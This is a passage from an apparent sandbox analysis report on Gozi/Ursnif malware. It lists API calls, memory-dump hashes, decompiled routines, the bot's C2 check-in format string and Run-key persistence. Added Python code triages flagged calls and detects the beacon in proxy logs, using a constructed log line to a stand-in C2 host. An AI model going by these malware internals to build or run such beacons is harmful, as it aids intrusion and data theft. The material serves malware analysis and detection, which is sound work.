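    name: str
    dll: str
    args: List[str]
    ref: int  # call-site address as printed after 'ref:'

@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    base: Optional[int] = None        # 'Offset:' of the memory dump
    pe_backed: Optional[bool] = None  # 'based on PE:'
    yara: bool = False                # a 'Yara matches' header was present
    api_id: str = ""

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Blocks are separated by blank lines; each '•' bullet belongs to the header above it."""
    blocks = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        blk, header = FunctionBlock(), ""
        for line in (l.strip() for l in chunk.splitlines() if l.strip()):
            if not line.startswith("• "):
                header = line
                blk.yara |= header == "Yara matches"
                continue
            body = line[2:]
            if header == "APIs" and (m := API_RE.match(body)):
                blk.apis.append(ApiCall(m["name"], m["dll"], m["args"].split(","), int(m["ref"], 16)))
            elif header == "Memory Dump Source" and (m := SRC_RE.match(body)):
                blk.base, blk.pe_backed = int(m["off"], 16), m["pe"] == "true"
            elif header == "Similarity" and body.startswith("API ID: "):
                blk.api_id = body[len("API ID: "):]
        blocks.append(blk)
    return blocks

def decode_query_vm(call: ApiCall) -> Optional[str]:
    """NtQueryVirtualMemory(Process, Base, InfoClass, Buffer, Length, ReturnLength):
    class 0 with a 0x1C-byte buffer is MemoryBasicInformation into a 32-bit
    MEMORY_BASIC_INFORMATION (7 x 4 bytes), i.e. a plain region walk."""
    if call.name != "NtQueryVirtualMemory" or len(call.args) < 5 or "?" in (call.args[2], call.args[4]):
        return None
    cls, length = int(call.args[2], 16), int(call.args[4], 16)
    if cls == 0 and length == 0x1C:
        return "MemoryBasicInformation, 32-bit MEMORY_BASIC_INFORMATION"
    return f"class 0x{cls:x}, length 0x{length:x}"

def triage(blocks: List[FunctionBlock]) -> List[str]:
    """One finding per suspicious call. A call from a region that is not
    PE-backed but has Yara hits is the unpacked/injected code, so say so."""
    out = []
    for blk in blocks:
        for call in blk.apis:
            if call.name not in SUSPICIOUS:
                continue
            where = f"{call.name}@{call.ref:08X}"
            if blk.base is not None:
                where += f" (dump+0x{call.ref - blk.base:X})"  # offset into the listed dump
            note = SUSPICIOUS[call.name]
            if blk.pe_backed is False and blk.yara:
                note += "; from non-PE-backed region with Yara hit"
            if detail := decode_query_vm(call):
                note += f"; {detail}"
            out.append(f"{where}: {note}")
    return out
```

Run `triage(parse_blocks(SAMPLE))` against a whole exported report to get one line per flagged call site; the "dump+0x..." offset is what to open in the corresponding .sdmp, and a CreateProcessAsUserW call from a non-PE-backed dump with Yara hits is the combination to chase first.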

APIs
• RtlNtStatusToDosError.NTDLL(00000000), ref: 0045AACF
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorStatus
• String ID:
• API String ID: 1596131371-0
• Opcode ID: fcd82abb142dd40547366caea3b9fba8f5f1b5e937b1e98b5cad6294f19844c8
• Instruction ID: 550f23ac2d01f39fd2543bebf367db114291ec3ee200b9c8fd83dd8fb4022796
• Opcode Fuzzy Hash: fcd82abb142dd40547366caea3b9fba8f5f1b5e937b1e98b5cad6294f19844c8
• Instruction Fuzzy Hash: 85C01231B043027FDA189F10DD1D92A7B15EB94340F00442DF44A80470EAF49850D616
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID: 7K7W
• API String ID: 0-1434392902
• Opcode ID: 941665f447f5255b3b3d504bfc6b2d7f8f00a2514701c929fd8b2648a4274fc5
• Instruction ID: e300b6882c0b2b5e9d5c3b0fcde79a368239a9f777b216ef15e71f4daf1f851d
• Opcode Fuzzy Hash: 941665f447f5255b3b3d504bfc6b2d7f8f00a2514701c929fd8b2648a4274fc5
• Instruction Fuzzy Hash: 80115B3551C2E25ECB17CB3880D15D67FA39F8721039A47DDC4C19F163C7199896CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7a1a20185242c23e6f847e1b77833af1a15d066d6087a49d0b3e71ee68db0111
• Instruction ID: fbbad15a55162872b52a07062bd14c2aaee078de977495bbc42274649e53ca72
• Opcode Fuzzy Hash: 7a1a20185242c23e6f847e1b77833af1a15d066d6087a49d0b3e71ee68db0111
• Instruction Fuzzy Hash: 85423971A00219DFCF18CF58C5D06ADBBF2EF85306F1481AAD852AB386D7389A49DF54
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
• Instruction ID: c2a8df562b36c3e25edfad197eebb154e57533739615ca0792ca6d9b27625fb1
• Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
• Instruction Fuzzy Hash: EDF15530908609DBCB0CCF99D4A04ADBBB2FF89315F14C29EE89667746C7385A59CF19
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: memcpy
• String ID:
• API String ID: 3510742995-0
• Opcode ID: 9c8e517d3a80d4f7685ebf3e7aa75aaafbb2756edbf5715a04deddaed301b957
• Instruction ID: f485c47805d6cfac4dfb3f443b0b390dfaa9d5342c97f377bb7d22163ea9c286
• Opcode Fuzzy Hash: 9c8e517d3a80d4f7685ebf3e7aa75aaafbb2756edbf5715a04deddaed301b957
• Instruction Fuzzy Hash: 96C11F35640B008FE325CF29C5809A7B3E1BF99304B54486ED9D787B61EB7AF852CB06
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3efe97dc2a8a4bba8ab3062923cd5757e39d6e6fc7d8f464bc03952a9de49752
                                                                                                                                        • Instruction ID: 8b95a6fe9d5933dbe9dab7d32b51cc75f05409efbe10e231f1a5e9fe0b21bf3f
                                                                                                                                        • Opcode Fuzzy Hash: 3efe97dc2a8a4bba8ab3062923cd5757e39d6e6fc7d8f464bc03952a9de49752
                                                                                                                                        • Instruction Fuzzy Hash: DC21935144E7C05FDB5387B848B56923FB0AF57204B8F58DBC0C28F4B3D558AA1AE722
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                        			E737522A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                        				intOrPtr _v8;
                                                                                                                                        				char _v12;
                                                                                                                                        				void* __ebp;
                                                                                                                                        				signed int* _t43;
                                                                                                                                        				char _t44;
                                                                                                                                        				void* _t46;
                                                                                                                                        				void* _t49;
                                                                                                                                        				intOrPtr* _t53;
                                                                                                                                        				void* _t54;
                                                                                                                                        				void* _t65;
                                                                                                                                        				long _t66;
                                                                                                                                        				signed int* _t80;
                                                                                                                                        				signed int* _t82;
                                                                                                                                        				void* _t84;
                                                                                                                                        				signed int _t86;
                                                                                                                                        				void* _t89;
                                                                                                                                        				void* _t95;
                                                                                                                                        				void* _t96;
                                                                                                                                        				void* _t99;
                                                                                                                                        				void* _t106;
                                                                                                                                        
                                                                                                                                        				_t43 = _t84;
                                                                                                                                        				_t65 = __ebx + 2;
                                                                                                                                        				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                        				_t89 = _t95;
                                                                                                                                        				_t96 = _t95 - 8;
                                                                                                                                        				_push(_t65);
                                                                                                                                        				_push(_t84);
                                                                                                                                        				_push(_t89);
                                                                                                                                        				asm("cld");
                                                                                                                                        				_t66 = _a8;
                                                                                                                                        				_t44 = _a4;
                                                                                                                                        				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                        					_push(_t89);
                                                                                                                                        					E7375240B(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                        					_t46 = 1;
                                                                                                                                        				} else {
                                                                                                                                        					_v12 = _t44;
                                                                                                                                        					_v8 = _a12;
                                                                                                                                        					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                        					_t86 =  *(_t66 + 0xc);
                                                                                                                                        					_t80 =  *(_t66 + 8);
                                                                                                                                        					_t49 = E737524C5(_t66);
                                                                                                                                        					_t99 = _t96 + 4;
                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                        						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                        						goto L11;
                                                                                                                                        					} else {
                                                                                                                                        						while(_t86 != 0xffffffff) {
                                                                                                                                        							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                        							if(_t53 == 0) {
                                                                                                                                        								L8:
                                                                                                                                        								_t80 =  *(_t66 + 8);
                                                                                                                                        								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                        								continue;
                                                                                                                                        							} else {
                                                                                                                                        								_t54 =  *_t53();
                                                                                                                                        								_t89 = _t89;
                                                                                                                                        								_t86 = _t86;
                                                                                                                                        								_t66 = _a8;
                                                                                                                                        								_t55 = _t54;
                                                                                                                                        								_t106 = _t54;
                                                                                                                                        								if(_t106 == 0) {
                                                                                                                                        									goto L8;
                                                                                                                                        								} else {
                                                                                                                                        									if(_t106 < 0) {
                                                                                                                                        										_t46 = 0;
                                                                                                                                        									} else {
                                                                                                                                        										_t82 =  *(_t66 + 8);
                                                                                                                                        										E737523B0(_t55, _t66);
                                                                                                                                        										_t89 = _t66 + 0x10;
                                                                                                                                        										E7375240B(_t89, _t66, 0);
                                                                                                                                        										_t99 = _t99 + 0xc;
                                                                                                                                        										E737524A7(_t82[2], 1);
                                                                                                                                        										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                        										_t66 = 0;
                                                                                                                                        										_t86 = 0;
                                                                                                                                        										 *(_t82[2])();
                                                                                                                                        										goto L8;
                                                                                                                                        									}
                                                                                                                                        								}
                                                                                                                                        							}
                                                                                                                                        							goto L13;
                                                                                                                                        						}
                                                                                                                                        						L11:
                                                                                                                                        						_t46 = 1;
                                                                                                                                        					}
                                                                                                                                        				}
                                                                                                                                        				L13:
                                                                                                                                        				return _t46;
                                                                                                                                        			}
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                        • Instruction ID: c67d1028c97533ee2c326668ff9f809ea537f951492346a82c35722e2a293e10
                                                                                                                                        • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                        • Instruction Fuzzy Hash: C92188729002089BD714DF68C884AABBBB9FF49350B4A8159E95ADB245D730F915C7E0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches

Memory Dump Source
• Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Memory Dump Source
• Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Memory Dump Source
• Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

APIs
  • Part of subcall function 004630DD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 00463111
  • Part of subcall function 004630DD: GetLastError.KERNEL32(?,00000000,?,?,?), ref: 004631D2
  • Part of subcall function 004630DD: ReleaseMutex.KERNEL32(00000000,?,00000000,?,?,?), ref: 004631DB
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 0045947E
  • Part of subcall function 0044AA04: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0044AA1E
  • Part of subcall function 0044AA04: CreateWaitableTimerA.KERNEL32(0046E0F8,?,?), ref: 0044AA3B
  • Part of subcall function 0044AA04: GetLastError.KERNEL32(?,?), ref: 0044AA4C
  • Part of subcall function 0044AA04: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 0044AA8C
  • Part of subcall function 0044AA04: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 0044AAAB
  • Part of subcall function 0044AA04: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 0044AAC1
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 004594E1
• StrChrA.SHLWAPI(00000000,0000007C), ref: 00459555
• StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 00459577
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004595B7
  • Part of subcall function 0044D658: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 0044D67A
  • Part of subcall function 0044D658: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?), ref: 0044D6AB
• WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 0045965D
• WaitForSingleObject.KERNEL32(?,00000000), ref: 00459692
• WaitForSingleObject.KERNEL32(?,00000000), ref: 004596A1
• _allmul.NTDLL(00000000,FF676980,000000FF), ref: 004596CE
• SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 004596E8
• HeapFree.KERNEL32(00000000,?,?,Main,00000001,00000000,00000000,00000000,00000000,?,?), ref: 0045972E
• _allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 00459776
• SetWaitableTimer.KERNEL32(FF676980,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000001,00000000,00000000,00000000,00000000,?), ref: 00459790
• ReleaseMutex.KERNEL32(?), ref: 004597C3
• WaitForSingleObject.KERNEL32(?,00000000), ref: 004597D4
• WaitForSingleObject.KERNEL32(?,00000000), ref: 004597E3
  • Part of subcall function 00460ED0: RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00460EEE
  • Part of subcall function 00460ED0: RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?,74B5F710,00000000), ref: 00460F13
  • Part of subcall function 00460ED0: RtlAllocateHeap.NTDLL(00000000,?), ref: 00460F24
  • Part of subcall function 00460ED0: RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?), ref: 00460F3F
  • Part of subcall function 00460ED0: HeapFree.KERNEL32(00000000,?), ref: 00460F5D
  • Part of subcall function 00460ED0: RegCloseKey.ADVAPI32(?), ref: 00460F66
• _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00459817
• SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00459831
• SwitchToThread.KERNEL32 ref: 00459833
• ReleaseMutex.KERNEL32(?), ref: 0045983D
• WaitForSingleObject.KERNEL32(?,00000000), ref: 0045987B
• WaitForSingleObject.KERNEL32(?,00000000), ref: 00459886
• _allmul.NTDLL(00000000,FF676980,000000FF), ref: 004598A9
• SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 004598C3
• SwitchToThread.KERNEL32 ref: 004598C5
• ReleaseMutex.KERNEL32(?), ref: 004598CF
• WaitForSingleObject.KERNEL32(?,00000000), ref: 004598E4
• CloseHandle.KERNEL32(?), ref: 00459932
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00459946
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00459952
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0045995E
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0045996A
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00459976
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00459982
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0045998E
• RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0045999D
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$Heap$FreeMultipleMutexObjectsRelease_allmul$Thread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemTrimUser
• String ID: Main
• API String ID: 2416128729-521822810

APIs
• lstrlen.KERNEL32(,00000000,?,?), ref: 004578D8
• RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00457972
• lstrcpyn.KERNEL32(00000000,?,?), ref: 00457987
• HeapFree.KERNEL32(00000000,00000000), ref: 004579A3
• StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,?,?), ref: 00457A7E
• StrChrA.SHLWAPI(00000001,00000020), ref: 00457A8F
• lstrlen.KERNEL32(00000000), ref: 00457AA3
• memmove.NTDLL(?,?,00000001), ref: 00457AB3
• lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 00457AD6
• RtlAllocateHeap.NTDLL(00000000,?), ref: 00457AFC
• memcpy.NTDLL(00000000,?,?), ref: 00457B10
• memcpy.NTDLL(?,?,?), ref: 00457B30
• HeapFree.KERNEL32(00000000,?), ref: 00457B6C
• RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00457C32
• HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 00457C7A
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
• String ID: $ gzip, deflate$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
• API String ID: 3227826163-537135598

APIs
• RtlAllocateHeap.NTDLL ref: 0044422D
• wsprintfA.USER32 ref: 00444290
• wsprintfA.USER32 ref: 004442D9
• wsprintfA.USER32 ref: 004442FD
• lstrcat.KERNEL32(?,726F7426), ref: 00444337
• wsprintfA.USER32 ref: 00444356
• wsprintfA.USER32 ref: 0044436F
• wsprintfA.USER32 ref: 00444393
• RtlAllocateHeap.NTDLL(00000000,00000800), ref: 004443B0
• RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 004443D1
• RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 004443F1
  • Part of subcall function 004599A4: lstrlen.KERNEL32(00000000,253D7325,74B481D0,77E2EEF0,77E2EB70,?,?,00444403,?,03BD8D60), ref: 004599CF
  • Part of subcall function 004599A4: lstrlen.KERNEL32(?,?,?,00444403,?,03BD8D60), ref: 004599D7
  • Part of subcall function 004599A4: strcpy.NTDLL ref: 004599EE
  • Part of subcall function 004599A4: lstrcat.KERNEL32(00000000,?), ref: 004599F9
  • Part of subcall function 004599A4: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00444403,?,03BD8D60), ref: 00459A16
• StrTrimA.SHLWAPI(00000000,004683E4,?,03BD8D60), ref: 00444425
  • Part of subcall function 00441705: lstrlen.KERNEL32(?,74B481D0,77E2EEF0,00444439,00470449,?), ref: 00441711
  • Part of subcall function 00441705: lstrlen.KERNEL32(?), ref: 00441719
  • Part of subcall function 00441705: lstrcpy.KERNEL32(00000000,?), ref: 00441730
  • Part of subcall function 00441705: lstrcat.KERNEL32(00000000,?), ref: 0044173B
• lstrcpy.KERNEL32(?,00000000), ref: 00444454
• lstrcat.KERNEL32(?,?), ref: 00444462
• lstrcat.KERNEL32(?,?), ref: 0044446C
• RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 00444477
• RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 00444493
  • Part of subcall function 00453ED5: memset.NTDLL ref: 00453F0E
  • Part of subcall function 00453ED5: memcpy.NTDLL(?,?,00000090,00000000,00000000,0000009F,0000009F,?,00000090,?), ref: 00453F1A
• HeapFree.KERNEL32(00000000,?,?,?,?,03BD8D60,00000001), ref: 00444559
• HeapFree.KERNEL32(00000000,?,00470449,?), ref: 0044456B
• HeapFree.KERNEL32(00000000,?,?,03BD8D60), ref: 0044457D
• HeapFree.KERNEL32(00000000,00000000), ref: 0044458F
• HeapFree.KERNEL32(00000000,?), ref: 004445A1
Strings
• EMPTY, xrefs: 004441FF
                                                                                                                                        • version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 0044428A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpy$memcpymemsetstrcpy
                                                                                                                                        • String ID: EMPTY$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
                                                                                                                                        • API String ID: 1483892062-304588751
                                                                                                                                        • Opcode ID: dc708a29bea9f7598b081620ff5ec4e13535f0f59e1fb848a76da6f4948b4210
                                                                                                                                        • Instruction ID: de4319cc9d82f5c85cb24cb4610d5fd74a816fa2ff46e1f538808ac1195bf624
                                                                                                                                        • Opcode Fuzzy Hash: dc708a29bea9f7598b081620ff5ec4e13535f0f59e1fb848a76da6f4948b4210
                                                                                                                                        • Instruction Fuzzy Hash: 7FB18771A04201AFEB01CF69DC40F5A7BE8FB88304F04092AF548D7261EAB4E919CB5F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%
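The routine above assembles the Gozi/Ursnif check-in request from the format string `version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s` (wsprintfA, then lstrcat onto a heap buffer). The Python below is an added example, not code from the Joe Sandbox report or from the sample: it extracts that query string from proxy-log lines and validates every field against the format (each `%u` is an unsigned 32-bit decimal, the `user` field is four zero-padded 32-bit hex words, so exactly 32 hex digits). It assumes the parameters travel as a plain URL query in the order the format string gives; the report shows only the format string, not the request, and later builds of this family wrap the parameters differently. The log lines, hostnames, addresses and field values are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Format string recovered from the dump (xrefs 0044428A):
#   version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
# %u is an unsigned 32-bit decimal; the four %08x make the user id exactly
# 32 hex digits (wsprintfA emits lowercase; matching here is case-insensitive).
BEACON_FIELDS = ("version", "soft", "user", "server", "id", "type", "name")
FIELD_PATTERNS = {
    "version": re.compile(r"^\d{1,10}$"),
    "soft":    re.compile(r"^\d{1,10}$"),
    "user":    re.compile(r"^[0-9a-f]{32}$", re.I),
    "server":  re.compile(r"^\d{1,10}$"),
    "id":      re.compile(r"^\d{1,10}$"),
    "type":    re.compile(r"^\d{1,10}$"),
    "name":    re.compile(r"^.+$"),
}
UINT32_FIELDS = ("version", "soft", "server", "id", "type")


def parse_beacon(query):
    """Return the check-in fields as a dict if `query` matches the format
    exactly (same keys, same order, each value well-formed), else None."""
    pairs = parse_qsl(query, keep_blank_values=True)
    if [k for k, _ in pairs] != list(BEACON_FIELDS):
        return None
    fields = dict(pairs)
    if any(not FIELD_PATTERNS[k].match(fields[k]) for k in BEACON_FIELDS):
        return None
    for k in UINT32_FIELDS:
        fields[k] = int(fields[k])
        if fields[k] > 0xFFFFFFFF:      # %u cannot exceed 32 bits
            return None
    # Split the user id back into the four DWORDs the four %08x were fed with.
    u = fields["user"]
    fields["user_words"] = tuple(int(u[i:i + 8], 16) for i in range(0, 32, 8))
    return fields


def scan_proxy_log(lines):
    """Return [(line_no, fields)] for every line carrying a URL whose query
    string is a well-formed check-in."""
    hits = []
    for n, line in enumerate(lines, 1):
        for token in line.split():
            if "://" not in token:
                continue
            url = urlsplit(token)
            fields = parse_beacon(url.query)
            if fields is not None:
                fields["host"] = url.hostname
                hits.append((n, fields))
    return hits


# Constructed proxy-log lines (hosts, addresses and values are made up).
SAMPLE_LOG = [
    "2020-11-26T10:01:02Z 10.0.0.5 GET http://c2.example.invalid/images/"
    "?version=250170&soft=3&user=0123456789abcdef0011223344556677"
    "&server=12&id=1000&type=1&name=WIN-DESKTOP 200",
    "2020-11-26T10:01:03Z 10.0.0.5 GET http://www.example.invalid/index.html 200",
    "2020-11-26T10:01:04Z 10.0.0.6 GET http://c2.example.invalid/"
    "?version=1&soft=2&user=notahexvalue&server=3&id=4&type=5&name=x 404",
]

if __name__ == "__main__":
    for line_no, f in scan_proxy_log(SAMPLE_LOG):
        print("line %d: host=%s bot=%s name=%s version=%d"
              % (line_no, f["host"], f["user"], f["name"], f["version"]))
```

The key order and the 32-hex-digit `user` check are what keep this from firing on ordinary query strings that happen to carry a `version` or `id` parameter; the `name` value is the only free-form field and is kept verbatim for pivoting on the infected host name.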

APIs
• RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 0045E446
• GetTickCount.KERNEL32 ref: 0045E45F
• wsprintfA.USER32 ref: 0045E4B2
• QueryPerformanceFrequency.KERNEL32(?), ref: 0045E4BD
• QueryPerformanceCounter.KERNEL32(?), ref: 0045E4C7
• _aulldiv.NTDLL(?,?,?,?), ref: 0045E4D9
• wsprintfA.USER32 ref: 0045E4EF
• wsprintfA.USER32 ref: 0045E50D
• wsprintfA.USER32 ref: 0045E524
• wsprintfA.USER32 ref: 0045E545
• wsprintfA.USER32 ref: 0045E57E
• wsprintfA.USER32 ref: 0045E5A1
• lstrcat.KERNEL32(?,726F7426), ref: 0045E5D6
• RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 0045E5EF
• GetTickCount.KERNEL32 ref: 0045E5FF
• RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 0045E613
• RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0045E631
• StrTrimA.SHLWAPI(00000000,004683E4,?,03BD8D60), ref: 0045E665
• lstrcpy.KERNEL32(00000000,00000000), ref: 0045E68F
• lstrcat.KERNEL32(00000000,?), ref: 0045E699
• lstrcat.KERNEL32(00000000,00000000), ref: 0045E69D
• HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 0045E71A
• HeapFree.KERNEL32(00000000,00000000,5448002F,00000000), ref: 0045E729
• HeapFree.KERNEL32(00000000,00000000,?,03BD8D60), ref: 0045E738
• HeapFree.KERNEL32(00000000,00000000), ref: 0045E749
• HeapFree.KERNEL32(00000000,?,?), ref: 0045E75A
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
• String ID:
• API String ID: 2878544442-0
• Opcode ID: 0275b923ef2652926a688958f298337c7740775b1c04401950a92e790ed29309
• Instruction ID: 0b44ee2c87c66441c542eb3c3a0b38cc962ab52cb0ecc3ed929d17f49fb4f54c
• Opcode Fuzzy Hash: 0275b923ef2652926a688958f298337c7740775b1c04401950a92e790ed29309
• Instruction Fuzzy Hash: D5A16071A00109EFDB01DFAADC84E9A3BA8EB08304F054426F908D7261FBB4D959DB5A
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00446D8E
• RtlEnterCriticalSection.NTDLL(00000000), ref: 00446DAB
• CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00446DFB
• DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00446E05
• GetLastError.KERNEL32 ref: 00446E0F
• HeapFree.KERNEL32(00000000,00000000), ref: 00446E20
• HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00446E42
• HeapFree.KERNEL32(00000000,?), ref: 00446E79
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 00446E8D
• RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00446E96
• SuspendThread.KERNEL32(?), ref: 00446EA5
• CreateEventA.KERNEL32(0046E0F8,00000001,00000000), ref: 00446EB9
• SetEvent.KERNEL32(00000000), ref: 00446EC6
• CloseHandle.KERNEL32(00000000), ref: 00446ECD
• Sleep.KERNEL32(000001F4), ref: 00446EE0
• ResumeThread.KERNEL32(?), ref: 00446F04
Strings
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00446D7F
• zgF, xrefs: 00446EF1
Memory Dump Source
